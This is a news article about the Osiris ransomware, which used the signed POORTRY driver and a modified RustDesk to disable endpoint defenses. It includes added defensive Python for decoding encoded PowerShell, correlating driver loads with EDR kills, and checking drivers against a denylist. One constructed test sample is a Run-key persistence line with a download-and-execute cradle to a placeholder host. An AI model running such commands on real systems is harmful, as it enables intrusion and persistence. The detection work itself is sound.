Osiris Ransomware’s Driver Hijack: POORTRY Powers a Stealthy New Threat

Osiris ransomware exploits the POORTRY driver via BYOVD tactics in attacks on a Southeast Asian conglomerate and U.S. firms, evading defenses with modified RustDesk tools. Security experts link it to experienced actors, urging driver audits and behavioral monitoring.
Written by Mike Johnson

A new ransomware strain known as Osiris has surfaced, loading the POORTRY driver in a bring-your-own-vulnerable-driver (BYOVD) attack to disable endpoint defenses before encrypting systems at a major Southeast Asian conglomerate late last year. Cybersecurity firm Security.com detailed the attack in a report published January 22, 2026, highlighting the use of a modified RustDesk remote access tool alongside the Poortry driver and drawing parallels to tactics employed by the Inc ransomware group.

The Osiris operation marks a further step in ransomware tradecraft: rather than fighting endpoint detection and response (EDR) software from user mode, the attackers load a signed kernel driver that Windows trusts and use its kernel privileges to switch those protections off. According to Security.com, the campaign targeted high-value entities, with initial access likely gained through phishing or exploited vulnerabilities, followed by lateral movement using living-off-the-land binaries.

Researchers noted that the ransomware’s encryption routine uses AES-256 for file contents and RSA-2048 to wrap the AES keys, so encrypted files cannot be recovered without the attackers’ private key, and that it appends a .osiris extension to each encrypted file. A ransom note demands payment in Bitcoin and threatens to publish exfiltrated data on a dark web leak site.

Poortry Driver: The BYOVD Enabler

The POORTRY driver carries a valid code-signing signature, so Windows loads it without complaint; once resident in the kernel it can terminate or blind security software, which is the whole point of a BYOVD attack. Security.com’s analysis revealed that the attackers loaded the driver to terminate EDR processes, clearing the way for the ransomware to run unimpeded. This mirrors a broader trend in which threat actors repurpose signed but abusable drivers, many of them shipped by legitimate software vendors.

SiliconANGLE reported on January 22, 2026, that Osiris demonstrates ‘sophisticated tactics and experienced attackers,’ linking it to an assault on a food service franchisee. The group’s operational security, including custom tooling, suggests a well-resourced team possibly splintered from established ransomware-as-a-service (RaaS) operations.

Trend Micro’s prior research on similar BYOVD campaigns, such as Agenda ransomware’s cross-platform exploits detailed in an October 2025 report, underscores the growing reliance on driver abuse to evade defenses.

Attack Chain Unraveled

The intrusion began with a modified RustDesk executable, which Security.com identified as a dropper for the Poortry driver. Once loaded, the driver handled process injection and defense evasion, silencing endpoint protections so that Osiris could spread across the network and encrypt unimpeded. Indicators of compromise include specific hashes for the RustDesk variant and Poortry.sys.

SiliconANGLE emphasized the attackers’ use of obfuscated PowerShell scripts for persistence, with C2 communication over encrypted channels. Victim data from the Southeast Asian conglomerate included sensitive financial records, prompting swift law enforcement notifications.
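The encoded and obfuscated PowerShell that SiliconANGLE describes is usually visible in process-creation telemetry before AMSI ever sees the script. The following Python is added here as an example and is not code from the article or from Security.com: it decodes the -EncodedCommand variants PowerShell accepts and scores the result against a handful of content indicators. The command lines it scans are constructed, and the indicator list and threshold are assumptions to tune against local baselines.

```python
"""Decode and score PowerShell command lines from process-creation logs.

Added example, not code from the article or from Security.com. It takes the
CommandLine field of Windows Security 4688 / Sysmon 1 style records; the
sample records below are constructed, not captured from an Osiris intrusion.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# PowerShell accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...), so match
# "-e<letters>" and confirm the prefix afterwards; "-ep" and "-eq" are rejected.
_ENC_FLAG = re.compile(r'-(e[a-z]*)\s+["\']?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)

# Content indicators checked against the raw command line plus the decoded script.
INDICATORS = [
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)),
    ("base64-decode", re.compile(r"FromBase64String", re.IGNORECASE)),
    ("char-code-build", re.compile(r"\[char\]\s*\d+", re.IGNORECASE)),
    ("download-cradle", re.compile(r"(?:Net\.WebClient|DownloadString|Invoke-WebRequest|iwr)\b", re.IGNORECASE)),
    ("run-key-persistence", re.compile(r"CurrentVersion\\Run", re.IGNORECASE)),
    ("scheduled-task", re.compile(r"(?:schtasks|Register-ScheduledTask)", re.IGNORECASE)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
]


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an -EncodedCommand variant, else None."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # -ep bypass, -eq, etc. are not encoded commands
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            return None  # looked encoded but is not valid UTF-16LE base64
    return None


@dataclass
class Verdict:
    cmdline: str
    decoded: Optional[str]
    indicators: List[str]

    @property
    def score(self) -> int:
        # Encoding by itself is a weak signal (admins use it too); each content hit adds one.
        return (1 if self.decoded is not None else 0) + len(self.indicators)


def analyze(cmdline: str) -> Verdict:
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (decoded or "")
    return Verdict(cmdline, decoded, [name for name, pat in INDICATORS if pat.search(text)])


def flag_suspicious(cmdlines, threshold: int = 3) -> List[Verdict]:
    """Verdicts at or above the threshold; 3 means encoding plus two content indicators."""
    return [v for v in map(analyze, cmdlines) if v.score >= threshold]


# Constructed sample: a Run-key persistence one-liner of the kind the article
# describes, encoded as an attacker would, plus two ordinary admin command lines.
PERSIST_SCRIPT = (
    "$p='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';"
    "Set-ItemProperty $p updater ([string]::Join('',([char]99,[char]109,[char]100)));"
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')"
)
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc " + encode_command(PERSIST_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    'powershell.exe -ep bypass -c "Get-Service | Where-Object Status -eq Running"',
]

if __name__ == "__main__":
    for v in flag_suspicious(SAMPLE_COMMAND_LINES):
        print(f"score={v.score} indicators={v.indicators}\n  decoded: {v.decoded}")
```

The decode step matters more than the scoring: most of the indicators only become visible after the UTF-16LE base64 blob is unpacked, which is also why AMSI, which sees the script after decoding, is a useful second layer.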

Posts on X from industry watchers like Wes DeVault on January 22 amplified the disclosure, noting Osiris’s potential ties to Locky family variants, though Security.com cautions against premature attribution without further forensic evidence.

Victim Profile and Impact

Osiris claimed American Vanguard, a U.S. chemical manufacturer, as a victim in early January 2026, as tracked by Hookphish. Ransomware.live, which monitors the group’s leak site, lists two confirmed victims, with exfiltrated data volumes exceeding 100GB in the conglomerate case per Security.com.

Financial repercussions remain undisclosed, but industry estimates peg average ransomware recovery costs at $4.5 million, per recent Sophos data. The attack disrupted operations for weeks, highlighting vulnerabilities in franchise supply chains.

RedPacket Security corroborated the American Vanguard breach on January 10, stressing no data was hosted or disclosed by trackers themselves.

Ties to Known Actors

Security.com points to tactical overlaps with Inc ransomware, including Poortry usage and RustDesk modifications, though code dissimilarities prevent definitive links. The Osiris binary’s string obfuscation and anti-analysis measures indicate developer maturity.

Historical context from Acronis’s 2017 analysis of an earlier Osiris variant tied it to Locky, but the new strain appears distinct, per The Hacker News coverage on January 22, 2026, which detailed the franchisee targeting.

Cisco Talos’s December 2025 report on DeadLock ransomware’s BYOVD loader exploiting Baidu drivers illustrates the technique’s proliferation across groups.

Defensive Strategies

Organizations should audit loaded drivers with tools such as driverquery and block known-bad driver hashes and signers through EDR policies. Security.com recommends behavioral monitoring for the anomalous kernel-callback activity associated with Poortry, which in practice surfaces as security processes terminating shortly after an unfamiliar driver loads.
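The sequence the article lays out (RustDesk dropper, kernel driver load, EDR processes terminated) is exactly the chain that behavioral monitoring should catch even when the driver’s signature is valid. The Python below is an added example, not Security.com’s detection logic: it correlates constructed Sysmon-style ProcessCreate, DriverLoad and ProcessTerminate records, scoring each driver load on where it was loaded from, who signed it, whether a kernel service was registered just before, and whether security-product processes died just after. The directory list, process names, weights and two-minute window are assumptions to tune locally.

```python
"""Correlate Sysmon-style events into a BYOVD / EDR-kill alert.

Added example, not code from the article or from Security.com. Records mimic
Sysmon event IDs 1 (ProcessCreate), 5 (ProcessTerminate) and 6 (DriverLoad)
but are constructed; the security-product process names, trusted driver
directories, weights and the two-minute window are assumptions to tune locally.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple

TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers", "c:\\windows\\system32\\driverstore")
SECURITY_PROCESSES = {"msmpeng.exe", "sentinelagent.exe", "csfalconservice.exe"}
WINDOW = timedelta(seconds=120)
ALERT_THRESHOLD = 3


def _when(ev) -> datetime:
    return datetime.fromisoformat(ev["UtcTime"])


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def driver_load_findings(ev) -> List[Tuple[int, str]]:
    """Static checks on a DriverLoad event: (weight, reason) pairs, empty if unremarkable."""
    findings = []
    image = ev["ImageLoaded"].lower()
    if not image.startswith(TRUSTED_DRIVER_DIRS):
        findings.append((2, f"driver loaded from non-standard path {ev['ImageLoaded']}"))
    status = ev.get("SignatureStatus", "Unavailable")
    if status != "Valid":
        findings.append((2, f"signature status {status}"))
    elif ev.get("Signature", "").lower() != "microsoft windows":
        # A valid non-Microsoft signature is normal for vendor drivers, so it only
        # nudges the score; Poortry-style drivers pass this check, as the article notes.
        findings.append((1, f"valid non-Microsoft signature: {ev.get('Signature')}"))
    return findings


@dataclass
class Alert:
    driver: str
    loaded_at: datetime
    score: int
    reasons: List[str]
    killed: List[str]

    @property
    def severity(self) -> str:
        return "high" if self.killed else "medium"


def correlate(events) -> List[Alert]:
    """One Alert per DriverLoad whose static findings plus surrounding activity cross the threshold."""
    events = sorted(events, key=_when)
    creates = [e for e in events if e["EventID"] == 1]
    terms = [e for e in events if e["EventID"] == 5]
    alerts = []
    for load in (e for e in events if e["EventID"] == 6):
        t0 = _when(load)
        findings = driver_load_findings(load)
        score, reasons = sum(w for w, _ in findings), [r for _, r in findings]
        # A kernel service registered just before the load (sc.exe create ... type= kernel).
        for c in creates:
            if timedelta(0) <= t0 - _when(c) <= WINDOW and "type= kernel" in c.get("CommandLine", "").lower():
                score += 2
                reasons.append(f"kernel service created via {_basename(c['Image'])} "
                               f"(parent {_basename(c.get('ParentImage', ''))}): {c['CommandLine']}")
        # Security processes dying shortly after the load: the EDR-kill signature itself.
        killed = [_basename(t["Image"]) for t in terms
                  if _basename(t["Image"]) in SECURITY_PROCESSES and timedelta(0) <= _when(t) - t0 <= WINDOW]
        score += 2 * len(killed)
        if score >= ALERT_THRESHOLD:
            alerts.append(Alert(load["ImageLoaded"], t0, score, reasons, killed))
    return alerts


# Constructed sample: RustDesk-spawned sc.exe registers a driver in a user-writable
# path, the driver loads with a valid third-party signature, two security agents die.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-01-05 02:14:03", "Image": "C:\\Windows\\System32\\sc.exe",
     "ParentImage": "C:\\Users\\Public\\rustdesk.exe",
     "CommandLine": "sc.exe create diskmon type= kernel binPath= C:\\Users\\Public\\diskmon.sys"},
    {"EventID": 6, "UtcTime": "2026-01-05 02:14:09", "ImageLoaded": "C:\\Users\\Public\\diskmon.sys",
     "Signed": "true", "Signature": "Contoso Hardware Ltd", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2026-01-05 02:14:11", "Image": "C:\\Program Files\\SentinelOne\\SentinelAgent.exe"},
    {"EventID": 5, "UtcTime": "2026-01-05 02:14:12", "Image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe"},
    # Benign noise: a Microsoft-signed driver from the normal directory and an unrelated exit.
    {"EventID": 6, "UtcTime": "2026-01-05 03:00:00", "ImageLoaded": "C:\\Windows\\System32\\drivers\\usbhub3.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2026-01-05 03:00:30", "Image": "C:\\Windows\\System32\\notepad.exe"},
    # Benign vendor driver: valid third-party signature, standard location, nothing around it.
    {"EventID": 6, "UtcTime": "2026-01-05 04:00:00",
     "ImageLoaded": "C:\\Windows\\System32\\DriverStore\\FileRepository\\contoso_gpu.sys",
     "Signed": "true", "Signature": "Contoso Corporation", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.driver} at {a.loaded_at} score={a.score}")
        for r in a.reasons + [f"security process terminated: {k}" for k in a.killed]:
            print("   -", r)
```

Note that the benign third-party driver scores 1 and the Microsoft driver scores 0: a valid signature is deliberately not enough to clear a driver, because Poortry’s signature was valid too. What separates it is the user-writable path, the kernel service registered seconds earlier by a process spawned from RustDesk, and the security agents exiting right after the load.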

Microsoft’s driver blocklist updates and AMSI scanning of PowerShell content add further mitigation layers. Restricting which remote management tools, such as RustDesk, are allowed to run, keeping them patched, and segmenting networks curb lateral movement.
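Microsoft ships its vulnerable driver blocklist as a WDAC policy, which makes it possible to check a driver inventory against it offline rather than waiting for a load to be blocked. The Python below is an added example, not Microsoft’s tooling or anything from the article: it parses a constructed policy fragment shaped like the policy’s <FileRules> section and applies assumed semantics (a Hash rule denies an exact SHA256 match, a FileName rule denies that file name at any version up to and including MinimumFileVersion) to a constructed inventory. The rule IDs, hashes and file names are placeholders, and signer-based deny rules, which the real blocklist also carries, are not modelled.

```python
"""Check a driver inventory against a WDAC-style driver denylist, offline.

Added example, not Microsoft's tooling or code from the article. The policy
fragment copies the shape of a WDAC SiPolicy <FileRules> section with Deny
rules keyed by Hash, or by FileName plus MinimumFileVersion; the rules, hashes
and inventory are constructed, and the semantics applied are an assumption:
a Hash rule denies an exact SHA256 match, a FileName rule denies that file
name at any version up to and including MinimumFileVersion. Signer-based
deny rules, which the real blocklist also carries, are not modelled.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Tuple

NS = {"p": "urn:schemas-microsoft-com:sipolicy"}
DENIED_HASH = "A" * 64  # constructed placeholder, not a real driver hash

POLICY_XML = f"""<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <FileRules>
    <Deny ID="ID_DENY_D_1" FriendlyName="constructed hash rule" Hash="{DENIED_HASH}" />
    <Deny ID="ID_DENY_D_2" FriendlyName="constructed: every version of diskmon.sys"
          FileName="diskmon.sys" MinimumFileVersion="65535.65535.65535.65535" />
    <Deny ID="ID_DENY_D_3" FriendlyName="constructed: contoso_flt.sys builds up to 2.9"
          FileName="contoso_flt.sys" MinimumFileVersion="2.9.0.0" />
  </FileRules>
</SiPolicy>
"""


@dataclass
class DriverRecord:
    path: str
    sha256: str
    version: str  # four-part file version from the driver's version resource


def parse_version(v: str) -> Tuple[int, ...]:
    """Numeric tuple so that 2.10.0.0 sorts after 2.9.0.0 (a string compare gets this wrong)."""
    parts = [int(x) for x in v.split(".")]
    return tuple(parts + [0] * (4 - len(parts)))[:4]


def load_deny_rules(xml_text: str) -> List[dict]:
    """Deny rules as dicts of the attributes that matter for matching."""
    root = ET.fromstring(xml_text)
    keys = ("ID", "FriendlyName", "Hash", "FileName", "MinimumFileVersion")
    return [{k: d.get(k) for k in keys if d.get(k) is not None}
            for d in root.findall("./p:FileRules/p:Deny", NS)]


def matches(rule: dict, rec: DriverRecord) -> bool:
    if "Hash" in rule:
        return rule["Hash"].lower() == rec.sha256.lower()
    if "FileName" in rule:
        name = rec.path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if name != rule["FileName"].lower():
            return False
        ceiling = rule.get("MinimumFileVersion", "65535.65535.65535.65535")
        return parse_version(rec.version) <= parse_version(ceiling)
    return False


def audit(inventory, rules) -> List[Tuple[DriverRecord, str]]:
    """Every (record, rule ID) pair where a deny rule hits an inventory entry."""
    return [(rec, r["ID"]) for rec in inventory for r in rules if matches(r, rec)]


# Constructed inventory: path from driverquery, SHA256 and version collected per file.
SAMPLE_INVENTORY = [
    DriverRecord("C:\\Users\\Public\\diskmon.sys", "1" * 64, "1.0.0.0"),
    DriverRecord("C:\\Windows\\System32\\drivers\\contoso_flt.sys", "2" * 64, "2.8.5.0"),
    DriverRecord("C:\\Windows\\System32\\drivers\\contoso_flt.sys", "3" * 64, "2.10.0.0"),
    DriverRecord("C:\\Windows\\Temp\\x.sys", DENIED_HASH, "9.9.9.9"),
    DriverRecord("C:\\Windows\\System32\\drivers\\usbhub3.sys", "4" * 64, "10.0.19041.1"),
]

if __name__ == "__main__":
    for rec, rule_id in audit(SAMPLE_INVENTORY, load_deny_rules(POLICY_XML)):
        print(f"DENY {rule_id}: {rec.path} v{rec.version}")
```

The version comparison is the part that bites in practice: compared as strings, "2.10.0.0" sorts below "2.9.0.0", so a patched build would be reported as old, which is why the tuple comparison is there.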

Trend Micro advocates memory scanning for fileless payloads, as seen in Agenda attacks, to detect early BYOVD stages.

Broader Implications

The Osiris emergence signals intensified focus on Southeast Asia and U.S. manufacturing, per ransomware.live tracking. With RaaS affiliates experimenting with BYOVD, expect copycat campaigns.

Regulatory pressures, including SEC disclosure rules, will amplify scrutiny on breached firms. Security.com urges vendor accountability for driver signing to stem abuse.

Dark Web Informer’s January 21, 2026, update lists ongoing negotiations, underscoring the persistent ransomware economy.
